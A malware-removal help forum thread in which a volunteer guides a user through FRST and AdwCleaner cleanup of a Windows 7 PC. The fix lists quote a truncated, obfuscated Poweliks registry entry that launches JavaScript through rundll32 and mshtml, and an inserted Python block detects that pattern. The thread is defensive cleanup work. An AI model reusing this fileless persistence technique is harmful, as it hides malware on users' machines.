2014-10-16 10:25 - 2013-12-27 16:00 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-16 10:24 - 2013-12-27 16:00 - 00003228 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-16 10:24 - 2013-12-27 16:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2014-10-16 10:24 - 2009-07-13 23:45 - 03009656 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 10:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-16 10:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 10:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 10:17 - 2013-12-09 20:09 - 00016803 _____ () C:\Windows\IE11_main.log
2014-10-16 10:17 - 2012-09-30 16:37 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-16 10:10 - 2013-08-20 17:30 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 10:07 - 2012-09-30 14:37 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-08 13:20 - 2014-04-12 09:31 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Paul Pratt

Some content of TEMP:
====================
C:\Users\JoseAlcazar\AppData\Local\Temp\ose00000.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 16:43

==================== End Of Log ============================



#4 jmantowin


Posted 05 November 2014 - 10:45 AM

Here is the attachment.




#5 nasdaq


Posted 05 November 2014 - 11:40 AM

Open Notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
start

HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
CHR DefaultSearchKeyword: Default -> conduit.search
CHR DefaultSearchURL: Default -> http://search.conduit.com/Results.aspx?ctid=CT3320691&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SPC9E6EF2F-5A94-4006-916C-319ED897D608&q={searchTerms}&SSPV=
CHR DefaultSuggestURL: Default -> http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]

End
Save the file as fixlist.txt in the same folder as FRST.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log, Fixlog.txt; please post it in your reply.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

Download Security Check by screen317 from here: http://screen317.spywareinfoforum.org/SecurityCheck.exe
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
p.s.
If the SecurityCheck program fails to run for any reason, run it as an Administrator.

If the site is busy or not available use this mirror site:
http://www.bleepingcomputer.com/download/securitycheck/

How is the computer running now?

Edited by nasdaq, 05 November 2014 - 02:00 PM.
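The fixlist entry marked `<==== Poweliks!` in the post above is a COM `localserver32` value whose data begins `rundll32.exe javascript:` instead of naming a server binary. As an added example (not part of the original posts and not FRST's own logic), this Python code scans FRST-style registry lines for that pattern; the function name, the regular expressions and the sample lines are assumptions constructed for illustration.

```python
import re

# rundll32 given a script URL plus mshtml,RunHTMLApplication instead of "some.dll,Export".
SCRIPT_LAUNCHER = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?:javascript|vbscript):.*?mshtml\s*,\s*RunHTMLApplication',
    re.IGNORECASE,
)
# COM server registration keys, which normally hold the path of a DLL or EXE.
COM_SERVER_KEY = re.compile(r"\\(?:LocalServer32|InprocServer32)$", re.IGNORECASE)
# FRST shortens long value data and reports how many characters it left out.
TRUNCATED = re.compile(r"\(the data entry has (\d+) more characters\)")

# Line 3 is modelled on the entry in this thread, with the SID replaced and the
# obfuscated script body dropped; the other lines are constructed benign entries.
SAMPLE_LINES = [
    r'HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe (Example Corp)',
    r'HKLM\...\Run: [ExamplePanel] => rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'HKU\S-1-5-21-0-0-0-1001\...A8F59079A8D5}\localserver32: rundll32.exe '
    r'javascript:"\..\mshtml,RunHTMLApplication ";eval("<removed> '
    r'(the data entry has 239 more characters). <==== Poweliks!',
    r'HKLM\...\CLSID\{00000000-0000-0000-0000-000000000000}\localserver32: C:\Example\server.exe',
    r'S1 ExampleDrv; \??\C:\Windows\system32\drivers\example.sys [X]',
]


def scan_frst_lines(lines):
    """Return one finding per 'KEY: DATA' line whose data is a rundll32 script launcher."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        # FRST registry lines put the key before the first ": " and the data after it.
        key, sep, data = raw.strip().partition(": ")
        if not sep or not SCRIPT_LAUNCHER.search(data):
            continue  # not a KEY: DATA line, or ordinary data (plain rundll32 dll,export is fine)
        hidden = TRUNCATED.search(data)
        findings.append({
            "line": number,
            "key": key,
            # True when the launcher sits where a COM server path belongs.
            "com_server_key": bool(COM_SERVER_KEY.search(key)),
            # Characters FRST did not print; the log shows only the start of the data.
            "hidden_chars": int(hidden.group(1)) if hidden else 0,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_frst_lines(SAMPLE_LINES):
        print(finding)
```

Because FRST prints only the start of long value data, a hit is a pointer to the live registry value rather than the full evidence.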


#6 jmantowin


Posted 05 November 2014 - 12:15 PM

Things look good...everything appears to be working normally now. The warnings from Norton and Malwarebytes seem to have stopped. I don't see any propagation of COMSurrogate either.

Anything else I should do?

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-11-2014
Ran by JoseAlcazar at 2014-11-05 11:53:51 Run:1
Running from C:\Users\JoseAlcazar\Videos\virus\Bleepinghelp
Loaded Profile: JoseAlcazar (Available profiles: JoseAlcazar & Guest)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start

HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
CHR DefaultSearchKeyword: Default -> conduit.search
CHR DefaultSearchURL: Default -> http://search.conduit.com/Results.aspx?ctid=CT3320691&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SPC9E6EF2F-5A94-4006-916C-319ED897D608&q={searchTerms}&SSPV=
CHR DefaultSuggestURL: Default -> http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]

End
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
"HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value deleted successfully.
"HKCR\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
Chrome DefaultSearchKeyword deleted successfully.
Chrome DefaultSearchURL deleted successfully.
Chrome DefaultSuggestURL deleted successfully.
AntiLog32 => Service deleted successfully.

==== End of Fixlog ====

 

# AdwCleaner v3.311 - Report created 05/11/2014 at 12:06:13
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : JoseAlcazar - JOSEALCAZAR-PC
# Running from : C:\Users\JoseAlcazar\Videos\virus\Bleepinghelp\adwcleaner_3.311.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344

-\\ Google Chrome v38.0.2125.111

[ File : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\preferences ]

[ File : C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [4488 octets] - [30/10/2014 15:26:11]
AdwCleaner[R1].txt - [1055 octets] - [05/11/2014 12:00:01]
AdwCleaner[R2].txt - [1116 octets] - [05/11/2014 12:05:48]
AdwCleaner[S0].txt - [4319 octets] - [30/10/2014 15:28:50]
AdwCleaner[S1].txt - [1038 octets] - [05/11/2014 12:06:13]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1098 octets] ##########



#7 nasdaq


Posted 05 November 2014 - 02:02 PM

One last scan.

Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
p.s.
If the SecurityCheck program fails to run for any reason, run it as an Administrator.

If the site is busy or not available use this mirror site:
http://www.bleepingcomputer.com/download/securitycheck/

How is the computer running now?

#8 jmantowin


Posted 05 November 2014 - 02:33 PM

Everything continues to operate normally. 

 

 

Results of screen317's Security Check version 0.99.89 
 Windows 7 Service Pack 1 x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled! 
Norton Security Suite  
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 Java 7 Update 71 
 Java version out of Date!
 Adobe Flash Player 10 Flash Player out of Date!
 Adobe Reader 10.1.12 Adobe Reader out of Date! 
 Google Chrome 38.0.2125.104 
 Google Chrome 38.0.2125.111 
````````Process Check: objlist.exe by Laurent```````` 
 Malwarebytes Anti-Malware mbamservice.exe 
 Malwarebytes Anti-Malware mbam.exe 
 JoseAlcazar Videos virus Bleepinghelp\SecurityCheck.exe
 Malwarebytes Anti-Malware mbamscheduler.exe  
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 1%
````````````````````End of Log``````````````````````
 



#9 nasdaq


Posted 06 November 2014 - 08:15 AM

You have the latest version of Java.

Get the latest version of the Adobe Reader.
http://get.adobe.com/reader/
Before your download I suggest you uncheck the box on the top right, "Yes, install McAfee Security Scan Plus - optional"; this is not required if you are not a McAfee subscriber. While the installation is in progress you can also deny the installation of any other programs that may be suggested.

When installed, remove your old version of the Reader using the Add/Remove Programs applet, if present.
<<<>>>

Critical vulnerabilities have been identified in old versions of Adobe Flash Player; please get the latest version.

Flash test site:
http://www.adobe.com/software/flash/about/
Install the new version or, if you have the latest, close the windows.

Flash Player Help / Find version
http://helpx.adobe.com/flash-player/kb/find-version-flash-player.html#main_Find_the_Flash_Player_version_installed_on_your_machine
===

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide, Best security practices. Keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/
===

#10 jmantowin


Posted 06 November 2014 - 06:08 PM

Done.

 

I can't thank you enough. Glad there are people out there to help out with these kinds of things.

 

Jman



#11 nasdaq


Posted 07 November 2014 - 07:58 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



